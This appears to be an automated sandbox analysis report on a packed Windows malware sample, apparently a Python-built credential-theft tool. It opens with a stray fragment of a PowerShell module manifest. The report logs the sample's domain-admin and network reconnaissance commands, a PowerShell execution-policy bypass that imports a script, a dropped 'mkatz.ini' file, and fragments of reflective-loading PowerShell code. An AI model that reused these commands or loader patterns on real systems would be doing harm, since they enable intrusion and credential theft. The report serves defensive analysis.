system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: UlJpFEz1Cj.exeVirustotal: Detection: 60%
Source: UlJpFEz1Cj.exeReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile read: C:\Users\user\Desktop\UlJpFEz1Cj.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c wmic ntdomain get domainname
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ntdomain get domainname
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net localgroup administrators
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup administrators
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group 'domain admins' /domain
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c wmic ntdomain get domainname
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net localgroup administrators
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net group 'domain admins' /domain
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ntdomain get domainname
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup administrators
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group 'domain admins' /domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile written: C:\Users\user\Desktop\mkatz.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: UlJpFEz1Cj.exeStatic file information: File size 6967362 > 1048576
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UlJpFEz1Cj.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: UlJpFEz1Cj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\unicodedata.pdb source: unicodedata.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ssl.pdb source: _ssl.pyd.0.dr
Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ctypes.pdb source: _ctypes.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdb source: _socket.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdbpd source: win32wnet.pyd.0.dr
Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: python27.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdb source: win32wnet.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\pyexpat.pdb source: pyexpat.pyd.0.dr
Source: Binary string: msvcp90.i386.pdb source: msvcp90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32pipe.pdb source: win32pipe.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdbU7 source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_hashlib.pdb source: _hashlib.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdbL source: win32api.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32event.pdb source: win32event.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb$ source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdbE source: _socket.pyd.0.dr
Source: Binary string: msvcm90.i386.pdb source: msvcm90.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb5 source: bz2.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdb source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb source: bz2.pyd.0.dr
Source: UlJpFEz1Cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UlJpFEz1Cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UlJpFEz1Cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UlJpFEz1Cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UlJpFEz1Cj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {[CmdletBinding()]Param([Parameter(Position = 0, Mandatory = $true)][String]$PPSDHKDSDBytSHDSDes32,[Parameter(Position = 1, Mandatory = $true)][String]$PPSDHKDSDBytes32,[Parameter(Position = 2, Mandat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: fineField('e_cparhdr', [UInt16], 'Public') | Out-Null$LHFSser.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null$LHFSser.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null$LHFSser.DefineFi
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: dy kernel32.dll GetExitCodeThread$GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])$GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateFo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: [Parameter(Position = 1, Mandatory = $true)][System.Object]$DJH32H)$NINOFSD = New-Object System.Object$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LKSHKDANDL, [Type]$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: Function LGDJSR{$DJH32H = New-Object System.Object$Domain = [AppDomain]::CurrentDomain$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')$AssemblyBuilder = $Domain.DefineDy
Source: UlJpFEz1Cj.exeStatic PE information: real checksum: 0x6aa63f should be: 0x6b21de
Source: Crypto.Cipher._ARC4.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xb865
Source: Crypto.Cipher._DES.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13233
Source: Crypto.Cipher._DES3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xf535
Source: Crypto.Cipher._AES.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16ef1
Source: Crypto.Hash._MD4.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x63cc

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\python27.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\pywintypes27.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcr90.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcp90.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcm90.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util._counter.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Random.OSRNG.winrandom.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\select.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5859
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2348
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util._counter.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Random.OSRNG.winrandom.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcp90.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\msvcm90.dllJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pydJump to dropped file
